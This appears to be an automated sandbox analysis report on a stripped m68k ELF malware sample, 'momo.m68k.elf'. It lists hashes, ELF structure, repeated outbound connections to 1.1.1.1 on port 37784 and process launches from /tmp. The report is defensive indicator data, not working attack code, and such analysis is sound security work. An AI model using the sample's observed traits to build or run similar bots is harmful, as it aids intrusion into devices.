                  File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):6.461373361448764
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:momo.m68k.elf
                  File size:90'040 bytes
                  MD5:3a2ca0a44ce8859251bac7659db54462
                  SHA1:d02c707d8a8f9f7624c29f798742044b23226db3
                  SHA256:8bbbebd38cf24db9b2673993a020bb5a00ca616abc6b9178122c533ddead6967
                  SHA512:f169ec875df5f03c7766128cd6267a2519177922c9aaccc52a766f800c6167cf1c55af99d515f00ce031b3183a648456aa342fa6ead353af74e903040deff041
                  SSDEEP:1536:rCwG6a33dIvwGfT4+pKGip1MwwgCZMrhtU5Ma/5Et49F+eM8UKeyRRSL4qCK:rCw4GfUkip1MwwgCZMrhuKaBZFLeP9
                  TLSH:D8935BE5F4016E3EF88FD176862F4E09AD6463D01B930F27E6A7FCA75CA2054BA12D41
                  File Content Preview:.ELF.......................D...4..^(.....4. ...(......................UX..UX...... .......U\..u\..u\......L....... .dt.Q............................NV..a....da...*.N^NuNV..J9..}.f>"y..ut QJ.g.X.#...utN."y..ut QJ.f.A.....J.g.Hy..UXN.X.......}.N^NuNV..N^NuN

                  ELF header

                  Class:ELF32
                  Data:2's complement, big endian
                  Version:1 (current)
                  Machine:MC68000
                  Version Number:0x1
                  Type:EXEC (Executable file)
                  OS/ABI:UNIX - System V
                  ABI Version:0
                  Entry Point Address:0x80000144
                  Flags:0x0
                  ELF Header Size:52
                  Program Header Offset:52
                  Program Header Size:32
                  Number of Program Headers:3
                  Section Header Offset:89640
                  Section Header Size:40
                  Number of Section Headers:10
                  Header String Table Index:9
                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x800000940x940x140x00x6AX002
                  .textPROGBITS0x800000a80xa80x12a2e0x00x6AX004
                  .finiPROGBITS0x80012ad60x12ad60xe0x00x6AX002
                  .rodataPROGBITS0x80012ae40x12ae40x2a740x00x2A002
                  .ctorsPROGBITS0x8001755c0x1555c0x80x00x3WA004
                  .dtorsPROGBITS0x800175640x155640x80x00x3WA004
                  .dataPROGBITS0x800175700x155700x8780x00x3WA004
                  .bssNOBITS0x80017de80x15de80x44080x00x3WA004
                  .shstrtabSTRTAB0x00x15de80x3e0x00x0001
                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x800000000x800000000x155580x155586.48530x5R E0x2000.init .text .fini .rodata
                  LOAD0x1555c0x8001755c0x8001755c0x88c0x4c944.72710x6RW 0x2000.ctors .dtors .data .bss
                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 5, 2025 15:21:36.023129940 CET442983778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:36.027965069 CET3778442981.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:36.028024912 CET442983778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:36.029093027 CET442983778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:36.033870935 CET3778442981.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:36.033987045 CET442983778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:36.038827896 CET3778442981.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:46.035110950 CET442983778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:46.039875984 CET3778442981.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:57.395494938 CET3778442981.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:57.395932913 CET442983778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:57.401089907 CET3778442981.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:58.398163080 CET443003778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:58.403017044 CET3778443001.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:58.403115988 CET443003778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:58.404164076 CET443003778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:58.408957005 CET3778443001.1.1.1192.168.2.13
                  Jan 5, 2025 15:21:58.409018040 CET443003778192.168.2.131.1.1.1
                  Jan 5, 2025 15:21:58.413791895 CET3778443001.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:19.780663967 CET3778443001.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:19.781171083 CET443003778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:19.786007881 CET3778443001.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:20.783699036 CET443023778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:20.788577080 CET3778443021.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:20.788659096 CET443023778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:20.790112972 CET443023778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:20.794859886 CET3778443021.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:20.794919968 CET443023778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:20.799654961 CET3778443021.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:42.158554077 CET3778443021.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:42.158948898 CET443023778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:42.164844036 CET3778443021.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:43.161262035 CET443043778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:43.166146040 CET3778443041.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:43.166213036 CET443043778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:43.167105913 CET443043778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:43.171906948 CET3778443041.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:43.171971083 CET443043778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:43.176740885 CET3778443041.1.1.1192.168.2.13
                  Jan 5, 2025 15:22:53.176836014 CET443043778192.168.2.131.1.1.1
                  Jan 5, 2025 15:22:53.181771994 CET3778443041.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:04.533277035 CET3778443041.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:04.533675909 CET443043778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:04.538511038 CET3778443041.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:05.536509991 CET443063778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:05.541610003 CET3778443061.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:05.541724920 CET443063778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:05.543040037 CET443063778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:05.547816992 CET3778443061.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:05.547893047 CET443063778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:05.552619934 CET3778443061.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:26.927592039 CET3778443061.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:26.928220987 CET443063778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:26.933068991 CET3778443061.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:27.932081938 CET443083778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:27.937877893 CET3778443081.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:27.937943935 CET443083778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:27.938779116 CET443083778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:27.944225073 CET3778443081.1.1.1192.168.2.13
                  Jan 5, 2025 15:23:27.944272995 CET443083778192.168.2.131.1.1.1
                  Jan 5, 2025 15:23:27.949079037 CET3778443081.1.1.1192.168.2.13

                  System Behavior

                  Start time (UTC):14:21:28
                  Start date (UTC):05/01/2025
                  Path:/tmp/momo.m68k.elf
                  Arguments:/tmp/momo.m68k.elf
                  File size:4463432 bytes
                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                  Start time (UTC):14:21:28
                  Start date (UTC):05/01/2025
                  Path:/tmp/momo.m68k.elf
                  Arguments:-
                  File size:4463432 bytes
                  MD5 hash:cd177594338c77b895ae27c33f8f86cc

                  Start time (UTC):14:21:28
                  Start date (UTC):05/01/2025
                  Path:/tmp/momo.m68k.elf
                  Arguments:-
                  File size:4463432 bytes
                  MD5 hash:cd177594338c77b895ae27c33f8f86cc